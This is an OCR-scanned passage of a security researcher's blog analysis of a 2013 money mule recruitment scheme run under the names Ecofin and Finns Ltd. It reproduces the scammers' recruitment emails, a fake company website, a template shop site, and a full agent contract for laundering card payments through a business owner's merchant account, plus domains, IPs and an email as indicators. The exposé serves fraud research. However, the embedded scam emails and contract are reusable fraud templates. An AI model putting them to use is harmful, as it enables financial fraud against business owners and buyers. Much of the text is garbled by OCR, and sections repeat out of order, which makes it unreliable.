Ecofin has launched various web-hosting projects which have tured out to be one of the Dest green wed Nosting firms. The 
company has been offering its broad consurner base with standardized web hosing services along with renewable and 
green efficiency by making use of pwot servers that are as a matier of fact, fed purely by solar energy 


Media content translation services 


Another vital achievement credited to Ecofin ts at & has been supporting various Gifferent companies in the Media content 
Yansiston semices industry 


Such companies have been offering Meir dientele with Human based Yansiaton service fom English to Spanish of texts as 
well as different media contents such 35 podcasts. audio. wdeo, mixed content and many others serices with a strong 
emphasis on content of legal and technical nature 


Ecofin, in such 3 competitive world has enabled various companies to provide the® clients aif around the globe with an 
utmost degree of perfection when it comes to content fansiaton in the industry 


As aresum our backend infrastructure and extensive capadiifes Nas allowed us to make our partner service providers come 
up with an unbeatable track record providing seraces to customers around the globe 


Our customers seek the highest quality industrial scale media content tansiaton solutions and ecofin is here to deliver upon 
Our noble promise and core value of Deing the Dest online based service provider for English to Spanish transiation 
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Sample About Us description: 

Ecofin is offering outstanding solutions which are useful in maximizing revenues that are 
generated through a wide range of investment sectors and global assets. A wide range of 
services and financial opportunities are being offered for manufacturers, developers, owners 
as well as financial investors interested in our niche investment portfolios and services. 


We are operating as a globally safe company as well as involving risk and integrity manage- 
ment expertise that brings together practical experience along with cutting edge, innovative 
engineering and technologies. The company is research based which is primarily focused on 
environmental sectors, alternative energy, infrastructure, as well as utility all around the globe. 


The firm is practicing a fundamental and basic approach while it comes to managing its 
clientele assets. Ecofin is useful in developing, branding as well as launching exclusive 
information sales podiums based on alternative, as well as green technological sources along 
with IT and web media themes. The company is dedicated to providing its clients with the 
highest levels of quality services and investment returns within the niche industries that we 
focus upon. 
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Projects Company Contact Us 


MEcofin 


About Ecofin 


in the present time, the company’s primary activities in the ernironmental niche focuses on promising enviconmental technologies along with allemnative energy with wast 
treatment sotution 


Contact details: 

+350 200 67911 (Gibraltar) 

+852 5808 2461 (Hong Kong) 
+54 11 5984 1154 (Buenos Aires) 
+44 20 3051 6249 (London) 
Skype: ecofin2013 

Suite 4, 209 Main Street 
Gibraltar GBZ 1AA 


A potentially socially engineered business owner would then be contacted with a simi- 
lar email: 

Please find the Contract draft attached, review and confirm your agreement with every point 
of it. The next step would be to provide the proper company data to be put in the contract 
and produce the final version for the signing. 


Please review the showcase website: 


This site will be copied into a new domain reflecting your company name and your com- 
pany data. 

As indicated, all customer service, sales, technical logistics, etc. are to be handled by us. You 
would need to open a merchant account for online credit card acceptance (E-commerce). 


The customers will be from all over the world. All the issues related to sales, marketing, 
customer service, supply, logistics, etc. are to be handled by us. You will be required to open 
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a merchant account for online credit card acceptance, receive the funds and transfer us the 
proceedings, as indicated in the contract draft with detail. No capital or any upfront payments 
from your side are required. If it is necessary to cover any upfront fees for the merchant 
account establishment, we will transfer such fees to you beforehand. 


Sample Web Site Template offered as an example of how a socially engineered business 
owner’s company branded Web site, would look like (greentechidea.com - 50.63.39.1): 


Welcome Guest, Login - Register 


@ creentech Shopping Cart 


Otems View Cort 


@Any Questions? call Welcome to Green Tech 
The precursor to Green Technology con be understood with the onset of Industriel Revolution in the 1850s. The 
we are happy to help you please call cr chat! industrial revolution changed the fece of humanity in terms of economic and technological advancement. As the 


developed countries started to grow and advance technically with increasing speed, this gave rise to one of the 
biggest problem of humenity thet is of pollution. With increesing population the need of increased production beceme 
the moentra. This started the establishment of new factories and industries. To fuel the increasing demand the use of 
non-reneweble fossil resources like coal and petroleum products increased, This was the sterting point tor 
increased oi po®ution and chemical discharge info the environment which ultimately gave rise to the increasing 


ar ar ar oa global warming and climate change 
gy CALL | 


The scope and growth of Green Technology it reaching ts zenith, at most of the courtries are putting in serinus effort to Hrrest heavily in as 
promotion and enplementation. Common people are becoming aware about the advantages of Green Technology and are making every eftort 


Miwon!) “oe 
Fotow us Products nasrocot 
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Welcome Guest, Login - Register 


@ creentech Shopping Cart 


ORems View Cart 


promeraiiees 


About us 


Any Questions? call About Us 
The 21st century has been called the “century of the environment.” Governments -and individual cftirens - can no lonper assume that 
we are happy to help you please cal or chat Socw! Challenges such a8 pollution. dwindling natural resources and climate change can be set asise for future generations 


The research and development in the Green Technology is becoming increasingly viable, as lot of new government and private Investments 
% poured m this fels 


We realize the ecision Mas to be made right now. As an nfative and respons@ie clizens of the earth we take our fest step in sharing our 
knowledge in the form of articies for the viewers. 


Our cbjectwes are to promote nnovatve use of technolbgy m Conservation of energy. scarce materials and natural resources and 
dssemnation of knowledge, encouraging the use of eco-friendly products 


We are taking this chance on real that with proper advancement and eurturing of new Green technologies and then put to practical use the 
Gay is net far behind when this Earth wil apain Become a truly Green planet 


Follow us 


About Us | Products | Samples | Tersss of Service | Copyright | Privacy Notice | Contact us 


Copyright © 2011-2012 GreenTechidea. Al Rights Reserved 
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Sample copy of the Contract: 
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f’Any Questions? call 


we are happy to help you" please cal or chat 


eee) 


Follow us 


BuG« 


Welcome to Green Tech 


The precursor to Green Technology can be understood with the onset of industrial Revolution in the 1650s, The industrial 
revolution changed the face of humanity in terms of ecomornic and technological advancement. As the developed countries 
Started to grow and advance technically with increasing speed, this gave rise to one of the biggest problem of humanity 
that is of pollution. With increasing population the need of increased production became the mantra. This started the 
establishment of mew factories and industries. To fuel the increasing demand the use of non-renewable fossa resources 
like coal and petroleum products increased. This was the starting point for increased air pollution and chemical discharge 
into the environment which ultimately gave rise to the increasing global warming and climate change. 


The scope and growth of Green Technology is reaching ts zenth, as most of the Coutries are putting in serous effort to nvest heavily in ts 


Promotion and implementation. Common people are becoming aware about the advantages of Green Technology and are making every effort 
to put ths Earth friendly technology to use mn ther daly ves. 


Products “Add to Cart 


[BIO MASS OPPORTUNITIES 


|) CO2 EMISSION REDUCTION 
Coz2 


Litter. 


[EMERGING TECHNOLOGY PHOTOVOLTAIC 


(©) GREEN TECHNOLOGY & BUSINESS TODAY 


{ 


(©) PRODUCTION OF BIO DIESEL 


[) PRODUCING ENERGY FROM SEAS 


REPRESENTATION 
AGREEMENT 
This Representation Agreement is made on this ... day of April of 2013 
Between: 

(1) Finns Ltd., a company with registration number 101434, incorporated under the laws 
of Gibraltar with registered office at Suite 24, Watergardens 6, Gibraltar and duly 
represented by Mr. Victor Bravo-Anguita, Director (“FINNS”) 

and 


Q) <COMPANY NAME>, a company with registration number registration number>, 


RECITALS 


(A) FINNS is a company engaged in the sale of proprietary information in the green 
technology field. 


(B) The Agent is a company involved in <business of Agent>. 
(C) FINNS wishes to engage Agent to provide certain outsourced services under the terms 
and conditions of this Representation Agreement (“Agreement”). 


IT IS AGREED AS FOLLOW: 


1, Appointment 
(A) FINNS hereby retains Agent to act as FINNS’s exclusive agent to provide the Services 
(as defined below) for the duration of the Term (as defined below) in the Territory (as 
defined below). 


(B) FINNS shall provide to the Agent all necessary information necessary for the Agent to 
provide the Services. 


2. Services 
The Agent shall: 

(A) represent, advise and counsel FINNS; 

(B) sign documents related to credit card acceptance for and on behalf of FINNS; and 
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(C) perform the FINNS Activities (as defined below in Clause 3(A) hereinafter referred to 
as the “Services”. 


3. Duties of the Agent 
In providing the Services, the Agent shall have the following specific obligations: 


(A) Perform FINNS Activities (being those activities specifically agreed between the 
parties in respect of sales process handling). 


(B) The Agent shall transfer to FINNS’s bank account all funds originating from FINNS 
Activities less the Agency Fee originated from FINNS activities and the 
Disbursements (as defined below) from Agent's bank at the earlier of either EUR 
3000 minus the Agency Fee or every 2 working days, via international bank wire. 
The cost of the international bank wire is deducted from the funds owed to FINNS. 


(C) The Agent shall agrees to provide FINNS with online view-only access to Agent's 
bank account in order for FINNS to audit the cash flow derived from FINNS 


(D) The Agent, shall, on a monthly basis provide a report to FINNS of all FINNS 
ee ing such amounts collected by the Agent on 
FINNS. 


(E) FINNS agrees that certain costs may be incurred by the Agent in the set-up and 
implementation of a business operation in the <country> (the “Territory”). In the 
event the Agent envisages such being incurred, the Agent will provide to FINNS all 
final cost estimates involving 3“ party services. Once agreed upon, FINNS will 
provide Agent with signed approval in a timely manner. FINNS further agrees that all 
approved costs relating to the above, will be either deducted from funds collected by 
the Agent (the “Disbursements”) on FINNS’s behalf or provided in installments by 
FINNS prior to the commencement of the activities under credible and pervasive 
evidence for such need (for instance — 3 party invoices), The ultimate decision to 
choose between the former and the latter belongs to FINNS. 


4. Agency Fee 
(A) As consideration for the Services to be provided by the Agent, the Agent shall receive 
5% (five percent) of the amounts collected and received by the Agent on behalf of 
FINNS originating from the FINNS Activities (the “Agency Fee"). 


(B)The Agency Fee shall be deducted by the Agent from funds to be transferred to 
FINNS in accordance with Clause 3(B) above. 


5. Term 
This Agreement shall commence on the date first written above and shall continue in full 


force and effect for a period of 1 (one) year unless otherwise terminated in accordance with 


6, Termination 


(A) — Without limiting its other rights or remedies, FINNS may terminate this Agreement 
with immediate effect by giving written notice to the Agent if: 

(a) the Agent commits a material or persistent breach of the Agreement and (if 
such a breach is remediable) fails to remedy that breach within 7 days of 
receipt of notice in writing of the breach; 

(b) the Agent commences negotiations with all or any class of its creditors with a 
view to rescheduling any of its debts, or makes a proposal for or enters into 
any compromise or arrangement with its creditors other than (where a 
company) for the sole purpose of a scheme for a solvent amalgamation of the 
Agent with one or more other companies or the solvent reconstruction of the 
Agent; 

(c) @ petition is filed, a notice is given, a resolution is passed, or an order is made, 
for or in connection with the winding up of the Agent (being a company) 
other than for the sole purpose of a scheme for a solvent amalgamation of the 
Agent with one or more other companies or the solvent reconstruction of the 
Agent, 

(¢) an application is made to court, or an order is made, for the appointment of an 
administrator or if a notice of intention to appoint an administrator is given or 
if an administrator is appointed over the Agent (being a company); or 

(e) the Agent suspends or threatens to suspend, or ceases or threatens to cease to 
carry on, all or a substantial part of its business. 


(B) Without limiting its other rights or remedies, FINNS may terminate the Agreement by 
giving the Agent | (one) months’ written notice. 


7. Consequences of Termination 


(a) the Agent shall immediately deliver to FINNS all monies then owing to 
FINNS less any applicable Agency Fee and Disbursements; 

(>) the accrued rights, remedies, obligations and liabilities of the parties as at 
termination shall not be affected, including the right to claim damages in 
respect of any breach of this Agreement which existed at or before the date of 

(c) Clauses which expressly or by implication have effect after termination shall 
continue in full force and effect. 


8, Indemnity 


(A) — The Agent shall keep FINNS indemnified in full against all costs, expenses, damages 
and losses (whether direct or indirect), including any interest, fines, legal and other 
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(B) 


(cy 


professional fees and expenses awarded against or incurred or paid by FINNS as a 
result of or in connection with any claim made against FINNS by a third party arising 
out of, or in connection with, the supply of the Services, to the extent that such claim 
arises out of the breach, negligent performance or failure or delay in performance of 
the Agreement by the Agent, its employees, agents or subcontractors. 


FINNS shall keep the Agent indemnified in full against all costs, expenses, damages 
and losses (whether direct or indirect), including any interest, fines, legal and other 
professional fees and expenses awarded against or incurred or paid by Agent as a 
result of or in connection with any claim or chargeback made against Agent by a third 
party arising out of, or in connection with the sales, activities and actions of FINNS, 
its employces, agents or subcontractors. 


This Clause 8 shall survive termination of this Agreement. 


9. Bank, Transaction Fees and Tax Liability 


All current or future bank fees, including, but not limited to, credit card processing, ACH 
transactions and bank administration and all current or future tax liability, including, but not 
limited to, local, EU or international tax, relating directly to the business activity conducted 
on behalf of FINNS, will be the responsibility of FINNS. When due, will be deducted and 
paid to the proper authority from funds collected by the Agent on behalf of FINNS. The 
Agent agrees to provide copies of all documentation, invoices and demands for payment to 
FINNS prior to making any payment relating to the above. 


10. General 


(A) Force majeure: Neither party shall be liable to the other as a result of any delay or 


failure to perform its obligations under this Agreement if and to the extent such delay 
or failure is caused by an event or circumstance which is beyond the reasonable 
control of that party which by its nature could not have been foreseen by such a party 
or if it could have been foreseen was unavoidable. If such event or circumstances 
prevent the Agent from providing any of the Services for more than 4 weeks, FINNS 
shall have the right, without limiting its other rights or remedies, to terminate this 
Agreement with immediate effect by giving written notice to the Agent. 


(B) Assignment and subcontracting: FINNS acknowledges that the Agent may engage 


other licensed or individual persons to fulfill certain terms of this Agreement save that 
such persons shall have no rights under this Agreement. 


(C) Waiver and cumulative remedies 


(a) A waiver of any right under this Agreement is only effective if it is in writing 
and shall not be deemed to be a waiver of any subsequent breach or default, No 
failure or delay by a party in exercising any right or remedy under this 
Agreement or by law shall constitute a waiver of that or any other nght or 
remedy, nor preclude or restrict its further exercise. No single or partial 
exercise of such right or remedy shall preclude or restrict the further exercise of 
that or any other right or remedy. 


(b) Unless specifically provided otherwise, rights arising under the Contract are 
cumulative and do not exclude rights provided by law. 


(D) Severance: 


(a) Ifa court or any other competent authority finds that any provision (or part of 
any provision) of this Agreement is invalid, illegal or unenforceable, that 
provision or part-provision shall, to the extent required, be deemed deleted, 
and the validity and enforceability of the other provisions of this Agreement 
shall not be affected. 

(b) If any invalid, unenforceable or illegal provision of this Agreement would be 
valid, enforceable and legal if some part of it were deleted, the provision shall 
apply with the minimum modification necessary to make it legal, valid and 
enforceable. 


(E) Third parties: A person who is not a party to this Agreement shall not have any rights 


under or in connection with it. 


(F) Variation: Any variation, including any additional terms and conditions, to this 


Agreement shall only be binding when agreed in writing and signed by FINNS. 


(G) Governing law and jurisdiction: Any dispute or claim arising out of, or in connection 


with this Agreement or its subject matter or formation (including non-contractual 
disputes or claims), shall be governed by, and construed in, accordance with, English 
law. 


(H) Disputes: In the event of a dispute arising out of or in connection with this Agreement, 


() 


the parties shall try to resolve the issue amicably within 15 day of a party notifying the 
other party of the grounds of the dispute. In the event that the parties are still unable 
to resolve the dispute, the parties agree that the dispute shall be finally resolved by 
arbitration under the ICC Rules (the ICC Rules then in force shall be deemed to be 
incorporated into this Agreement) in the LCIA. There shall be a single arbitrator 
appointed by the Chairperson of LCIA and the seat of arbitration shall be London. 
The arbitration shall be conducted in English. The parties agree that the arbitrator's 
decision shall be final and binding on the parties and the losing party shall bear the 
cost of the arbitration proceedings. 


Validity: This Agreement shall be executed in the quantity of 2 original copies signed 
by FINNS’s and the Agent's representatives and then retained in the quantity of | 
original copy by FINNS and | original copy by the Agent, each copy of the 
Agreement signed shall serve as an original. 
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This Agreement has been entered into on the date stated at the beginning of it. 


Victor Bravo-Anguita on behalf of Finns Ltd. 


<Full Name>, on behalf of <COMPANY NAME> 


Sample domains from the mule recruitment campaigns spamvertised over email: 
googleapp-consult.com 

googleapps-euro.com 

worlds-trade.com 

trades-consult.com 

worlds-diploms.com 


Sample name servers involved in the campaign: 

NS1.ELCACAREO.NET - 184.82.62.16; 136.0.16.169; 184.82.204.70 - Email: shanghaiher- 
ald32@yahoo.com 

NS2.ELCACAREO.NET - 6.87.78.121 


The same email (shanghaiherald32@yahoo.com) is also known to have also been used 
to register the following fraudulent/malicious domains: 

badstylecorps.com 

tvblips.net 

viperlair.net 


[26]"The only green is money". 


This post has been reproduced from [27]Dancho Danchev’s blog. Follow him 
[28]on Twitter. 


1 
2. 

3. http: //blog.webroot.com/2013/03/22/spotted-cybercriminals-working-on-new-western-union-based-money-mule-m 
4. 

5. 


6. http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 


7. http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.html 


8. http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short.htm 
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9. http: //ddanchev. blogspot . com/2011/03/keeping-money-mule-recruiters-on-short .html 
10, http: //ddanchev. blogspot .con/2011/01/kesping-noney-mile-recruiters-on-short. ta 
_hetp: //Adanchev blogspot .con/2010/04/dns~infrastructure-of-noney-mule. hea] 

| http: //adanchev blogspot .con/2010/04/keeping-noney-mule-recruiters-on-short tal 
| http: //adanchev blogspot .con/2010/08/noney-mule- recruitment campaign serving heal] 
_ http: //adanchev blogspot .con/2010/08/noney-nule-recruiters-on-yahoos-veb heal 
_hetp: //Adanchev blogspot .con/2010/02/dissecting-ongoing-noney-nule hea] 

| http: //adanchev blogspot. con/2010/02/keeping-noney-mule-recruiters-on-short tal 


ttp://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


19. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 
20. http://ddanchev. blogspot . com/2009/10/standardizing-money-mule-recruitment.htm 


ttp://ddanchev. blogspot .com/2009/05/inside-money-1laundering- groups- spamming. htm 


22, hep: / /ddanchev. blogspot .con/2008/07/noney-mule-recruiters-use-aeprons~fast. tall 
_http://adanchey blogspot .con/2008/10/noney-mules-syndicate-actively tall 
| http://adanchey blogspot. con/2009/10/standardizing-noney-mule-recruitment. kin 
25, htep:/ /ddanchev. blogspot .con/2009/10/standardizing-noney-mule~recruitnent. ita 

| http://mwy. ind .con/title/¢e1027718 

| http://twitter.con/danchodancher 


9.8.12 Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand- 
Jacking Money Mule Recruitment Scheme (2013-08-29 22:41) 


Over the years, I’ve been actively researching the money mule recruitment epidemic, pro- 
viding actionable (real-time/historical) intelligence on their activities, exposing [1]their DNS 
infrastructure, offering exclusive peek inside [2]the Administration Panels utilized by money 
mules, emphasizing on current and emerging tactics applied by the individuals orchestrating 
the final stages of a fraudulent operation - the cash out process through basic risk-forwarding. 


Catch up with previous research on the money mule recruitment problem: 


[3]Spotted: cybercriminals working on new Western Union based ‘money mule manage- 
ment’ script 


[4]Keeping Money Mule Recruiters on a Short Leash - Part Eleven 


[5]Keeping Money Mule Recruiters on a Short Leash - Part Ten 


[6]Keeping Money Mule Recruiters on a Short Leash - Part Nine 


[7]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 


[8]Keeping Money Mule Recruiters on a Short Leash - Part Seven 


[9]Keeping Money Mule Recruiters on a Short Leash - Part Six 


[10]Keeping Money Mule Recruiters on a Short Leash - Part Five 
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¢ [11]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
¢ [12]Keeping Money Mule Recruiters on a Short Leash - Part Four 

¢ [13]Money Mule Recruitment Campaign Serving Client-Side Exploits 
e [14]Keeping Money Mule Recruiters on a Short Leash - Part Three 

¢ [15]Money Mule Recruiters on Yahoo!’s Web Hosting 

¢ [16]Dissecting an Ongoing Money Mule Recruitment Campaign 

¢ [17]Keeping Money Mule Recruiters on a Short Leash - Part Two 

¢ [18]Keeping Reshipping Mule Recruiters on a Short Leash 

¢ [19]Keeping Money Mule Recruiters on a Short Leash 

¢ [20]Standardizing the Money Mule Recruitment Process 

¢ [21]lInside a Money Laundering Group’s Spamming Operations 

¢ [22]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


¢ [23]Money Mules Syndicate Actively Recruiting Since 2002 


In this post, I'll profile a novel money mule recruitment scheme, that involves high profit mar- 
gins - of course for the ones organizing the scheme - through a direct, and most importantly, 
(pseudo) legal brand-jacking of a gullible business owner’s brand name, enticing him/her into 
opening a merchant account for processing E-commerce transactions, coming from more 
gullible and socially engineered mules. 


It all begins with an email coming from a non-existent "environmental enterprise", that 
in this particular case is abusing Google’s brand in an attempt to increase the probability of a 
successful interaction with the socially engineered business owners: 


Sample email: 


Environmental enterprise searching for representation internationally 
5 % commission on 200K cash flow originated from promotion and sales of proprietary 
research articles 


Necessary conditions: 
- Own a company - Be reachable on daily basis through E-mail, phone or Skype - Proper 
execution of all planned undertakings 


In case if being interested, please provide: 
- Name and Surname - Age - Telephone number (including country code) - City and Country - 
Email 
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Please answer to: NAME@googleapp-consult.com 


Faithfully yours, 
HR dept 


Those who reply are kindly asked to open a merchant bank account using their own 
company data, and assured that, despite the fact that the Web site which will be selling 
the bogus ‘research articles’ will be using their (legitimate) business brand’s name and 
contact details, they will still receive their 5 % commission on a 200,000/250,000 EUR in 
anticipated revenue, which would naturally be coming directly from other mules participating 
in the fraudulent scheme. Moreover, despite that a business owner will have his company 
brand, logo, contact information listed at the Web site, he/she will have zero visibility to the 
non-existent purchasing process of this research, as "all customer service, sales, technical 
logistics, etc. are to be handled by us." 


Why would a potential cybercrime syndicate want a socially engineered business owner 
to open a merchant bank account using his/her own data? Pretty simple. In my previous 
research on [24]the standardization of the money mule recruitment process, | emphasized on 
how money mules are often vetted through online-based surveys, which always ask important 
from a mule recruiter’s perspective question, such as - when did you you first open your bank 
account, and do you have any limitations on incoming/ongoing monetary transactions on it? 


However, an established company would always benefit from the trust it has already es- 
tablished with its financial institution/service of choice, meaning that, it will not only get its 
merchant account open, but also, will successfully pass the majority of verification protection 
mechanisms for high volume transactions put into the place by the financial institution/service 
in place. 


Sample reply email: 
Thank you for your reply. 


We are a company involved in development, branding and launching of several web me- 
dia and IT projects involved in consulting on green technology, renewables and alternative 
energy sources. Several of the projects are being currently launched online and each one 
will need to have a card payment interface. This collaboration refers to opening a merchant 
account for online credit card acceptance (E-commerce). 


We would need your company to open a merchant account for card acceptance 
and handle the receivables derived from the sales generated by each project. 
A bank/payment provider will facilitate data needed for website integration with their E- 
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commerce payment gateway. We will handle the technical side of such integration in full. 


We will brand the website under your company, therefore the administrative 
company data listed on the website will be yours, but all customer service, tech- 
nical logistics and sales are to be handled by us. The products sold will be proprietary 
research articles and information packages on green technology, renewables and alternative 
energy sources. 


Incoming proceedings from sales will be settled by the bank (or the payment provider) 
into your business bank account on a time scale defined by the bank (or the payment 
provider). 

These sale proceedings will be transferred to us, minus your commission and expenses 
incurred. The volume of monthly payments processed through the merchant account 
will be in the order of EUR 200,000 - EUR 250,000 per month in the initial months. 
The expected rise is roughly 5-6 % every month. The commission proposed to you 
stands at 5 % of the mentioned volume. 


All the expenses related to the operation including the banking and transactions fees 
and the merchant account setup and related fees are to be covered by us. If you agree in 
principle, | will provide the contract draft to define the legal terms of our collaboration. 


Yours sincerely, 


Michael Torti 

General Manager 

ECOFIN Projects (Gibraltar) 
Tel/Fax: +350 2006 1287 


Who are ECOFIN Projects (ecofinservices.net - 50.63.220.106) ? Nothing more than [25]a 
cybercrime-friendly "marketing agency" at its best. 
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Welcome to Ecofin 


Econ is offering outstanding solutions which are useful in maximizing revenues Mat are generated through 3 wide range of irwestment sectors and global as 
of services and financial opportunites are being offered for manufacturers, Gevelopers, owners 35 well as financial investo 
seraces 
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The firm is practicing a fundamental and basic approach while it comes to managing its clientele assets. Ecofin is useful in Geveloping, branding as well as launching exclusive 
information sales podiums based on alternative, as well as green technological sources along wah IT and web media themes. The company is dedicated fo providing its cients 


with the highest levels of quality serices and investment returns within the niche industries Mat we focus upon 


SHOULD SUPERMARKETS CHARGE 
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MECcOfin 


Ecofin Projects 


Green web hosting 


The year 2011 has tumed oul to be & successful year, especially when it comes to the envionment as a large number of 
companies throughout the globe has been following the ideal concept of ‘Being Green’. Ecofin has in turn made numerous 
global companies worldwide follow ats lead converting them into Green freindly companies 


Consequently, this has helped in acquiring a large consumer Base, Wh a dedicated effort and commitment to being green 
everyone has preferred investing in the green technological solutions, and ulimately it was not just 2 single solitary firm 
working on the idea 


AS we focus on one of our Core ideals of doing a lot Detter for the emaronment today stil there is Se when you will be able to 
have 3 Detter future by taking strong initiatives today 


Ecofin has launched various web-hosting projects which have tumed out to be one of the Dest green wed hosting firms. The 
company has been offering its broad consumer base with standardized web hosting seraces along with renewable and 
green efficiency by making use of plot servers Mal are as a matter of fact, fed purely by solar energy 


Media content translation services 


Another vital achievement credited to Ecofin is that & has been supporting various Gifferent companies in the Media content 
Yansiaton serices industry 


Such companies have Deen offering Meir clientele with Human based Wansiaton service from English to Spanish of texts as 
well 33 different media contents such as podcasts, audio, video, mixed content and many others senices with 2 strong 
emphasis on content of legal and technical nature 


Ecofin, in such 3 competitive world has enabled various companies to provide the clients a around the globe with an 
utmost degree of perfection when it comes to content fansiaton in the industry 


As aresuR our backend infrastructure and extensive capabiies Nas allowed us to make our partner service providers come 
Up with an unbeatable track record providing senices to customers around the globe 


Our customers seek the highest quality, industrial scale media content tansiaton solutions and ecofin is here to deliver upon 
our noble promise and core value of being the best online based service provider for English to Spanish transiation 


Proprietary green technology reports 
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SHOULD SUPERMARKETS CHARGE 
FOR PLASTIC BAGS? 


66 Derm 


Wekorne to our ste 


Media content translation services | Human 
transiation senice from English to Spanish of 


7 NATURAL PRODUCTS TO BANISH Green web hosting | Project pe 
PREGNANCY ACNE spat 


Sample About Us description: 


Ecofin is offering outstanding solutions which are useful in maximizing revenues that 
are generated through a wide range of investment sectors and global assets. A wide 
range of services and financial opportunities are being offered for manufacturers, developers, 
owners as well as financial investors interested in our niche investment portfolios and services. 


We are operating as a globally safe company as well as involving risk and integrity manage- 
ment expertise that brings together practical experience along with cutting edge, innovative 
engineering and technologies. The company is research based which is primarily focused on 
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environmental sectors, alternative energy, infrastructure, as well as utility all around the globe. 


The firm is practicing a fundamental and basic approach while it comes to managing its 
clientele assets. Ecofin is useful in developing, branding as well as launching exclusive 
information sales podiums based on alternative, as well as green technological sources along 
with IT and web media themes. The company is dedicated to providing its clients with the 
highest levels of quality services and investment returns within the niche industries that we 
focus upon. 


Company Contact Us 


MS Ecofin 


About Ecofin 


which provides in-depth 


@ are in constam search for global partners in the European Union, Asia Pacific region and South America for outsourcing accounts receivables of the projects Mat we 


The purpose is to build a robust sales logistics base in several key areas of the globe. and at the same time to afvact local expos 


aggresevely invesor 


jo our projects. The company has been 


9 across the thre 


Ecofin is supported t 
are completely com 


Gustry backgrounds which 


The company is active gloDally when it comes to environments 


number of distinctweness of utiles: they are the ones which are providing vital services. are capita 
regulated 


anc are normally 


in the present time, the company's primary activities in the ernironmental niche focuses on promising environmental technologies along with allernative energy with waste 
veatment sotutions 


Contact details: 


+350 200 67911 (Gibraltar) 

+852 5808 2461 (Hong Kong) 
+54 11 5984 1154 (Buenos Aires) 
+44 20 3051 6249 (London) 
Skype: ecofin2013 

Suite 4, 209 Main Street 
Gibraltar GBZ 1AA 
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A potentially socially engineered business owner would then be contacted with a simi- 
lar email: 


Please find the Contract draft attached, review and confirm your agreement with every 
point of it. The next step would be to provide the proper company data to be put in the 
contract and produce the final version for the signing. 


Please review the showcase website: 


This site will be copied into a new domain reflecting your company name and your com- 
pany data. 

As indicated, all customer service, sales, technical logistics, etc. are to be handled by us. You 
would need to open a merchant account for online credit card acceptance (E-commerce). 


The customers will be from all over the world. All the issues related to sales, marketing, 
customer service, supply, logistics, etc. are to be handled by us. You will be required to open 
a merchant account for online credit card acceptance, receive the funds and transfer us the 
proceedings, as indicated in the contract draft with detail. No capital or any upfront payments 
from your side are required. If it is necessary to cover any upfront fees for the merchant 
account establishment, we will transfer such fees to you beforehand. 


Sample Web Site Template offered as an example of how a socially engineered business 
owner’s company branded Web site, would look like (greentechidea.com - 50.63.39.1): 
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Reduce 
Reuse and Recycle! 


Any Questions? call Welcome to Green Tech 
The precursor to Green Technology can be understood with the onset of Industriel Revolution in the 1850s, The 
we are happy to help you please call or chat! industrial revolution changed the face of humandly in terms of economic and technotogical advancement. As the 


developed countries started to grow and advance technically with increasing speed, thés gave rise to one of the 
biggest problem of humenity thet it of pollution, With incressing population the need of increesed production become 
the mantra. This started the establishment of mew factories and industries. To fuel the increasing demand the use of 
non-renewable fossil resources like coel and petroleum products increased, This was the sterting point tor 
increased oi po®ution and chemical discherge info the environment which ultimately gave rise to the increasing 


oOo global werming and climate change. 
oy CALE ) 


The scope and growth of Green Technology it reaching ts zenth, at most of the courtries are putting in serious effort to nest heavily in ts 
promotion and mnplementation, Common people are becoming aware about the advantages of Green Technology and are making every eftort 
to pea this Earth trienaty technology to use in thee daly Fves 


Follow us Products "Add to Cort 
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Welcome Guest, Login - Register 


@ creentech Shopping Cart 


ORems View Cart 


promeraiiees 


About us 


Any Questions? call About Us 
The 21st century has been called the “century of the environment.” Governments -and individual cftirens - can no lonper assume that 
we are happy to help you please cal or chat Socw! Challenges such a8 pollution. dwindling natural resources and climate change can be set asise for future generations 


The research and development in the Green Technology is becoming increasingly viable, as lot of new government and private Investments 
% poured m this fels 


We realize the ecision Mas to be made right now. As an nfative and respons@ie clizens of the earth we take our fest step in sharing our 
knowledge in the form of articies for the viewers. 


Our cbjectwes are to promote nnovatve use of technolbgy m Conservation of energy. scarce materials and natural resources and 
dssemnation of knowledge, encouraging the use of eco-friendly products 


We are taking this chance on real that with proper advancement and eurturing of new Green technologies and then put to practical use the 
Gay is net far behind when this Earth wil apain Become a truly Green planet 


Follow us 


About Us | Products | Samples | Tersss of Service | Copyright | Privacy Notice | Contact us 


Copyright © 2011-2012 GreenTechidea. Al Rights Reserved 


4763 


Sample copy of the Contract: 
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f’Any Questions? call 


we are happy to help you" please cal or chat 


eee) 


Follow us 
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Welcome to Green Tech 


The precursor to Green Technology can be understood with the onset of industrial Revolution in the 1650s, The industrial 
revolution changed the face of humanity in terms of ecomornic and technological advancement. As the developed countries 
Started to grow and advance technically with increasing speed, this gave rise to one of the biggest problem of humanity 
that is of pollution. With increasing population the need of increased production became the mantra. This started the 
establishment of mew factories and industries. To fuel the increasing demand the use of non-renewable fossa resources 
like coal and petroleum products increased. This was the starting point for increased air pollution and chemical discharge 
into the environment which ultimately gave rise to the increasing global warming and climate change. 


The scope and growth of Green Technology is reaching ts zenth, as most of the Coutries are putting in serous effort to nvest heavily in ts 


Promotion and implementation. Common people are becoming aware about the advantages of Green Technology and are making every effort 
to put ths Earth friendly technology to use mn ther daly ves. 


Products “Add to Cart 


[BIO MASS OPPORTUNITIES 


|) CO2 EMISSION REDUCTION 
Coz2 


Litter. 


[EMERGING TECHNOLOGY PHOTOVOLTAIC 


(©) GREEN TECHNOLOGY & BUSINESS TODAY 


{ 


(©) PRODUCTION OF BIO DIESEL 


[) PRODUCING ENERGY FROM SEAS 


REPRESENTATION 
AGREEMENT 
This Representation Agreement is made on this ... day of April of 2013 
Between: 

(1) Finns Ltd., a company with registration number 101434, incorporated under the laws 
of Gibraltar with registered office at Suite 24, Watergardens 6, Gibraltar and duly 
represented by Mr. Victor Bravo-Anguita, Director (“FINNS”) 

and 


Q) <COMPANY NAME>, a company with registration number registration number>, 


RECITALS 


(A) FINNS is a company engaged in the sale of proprietary information in the green 
technology field. 


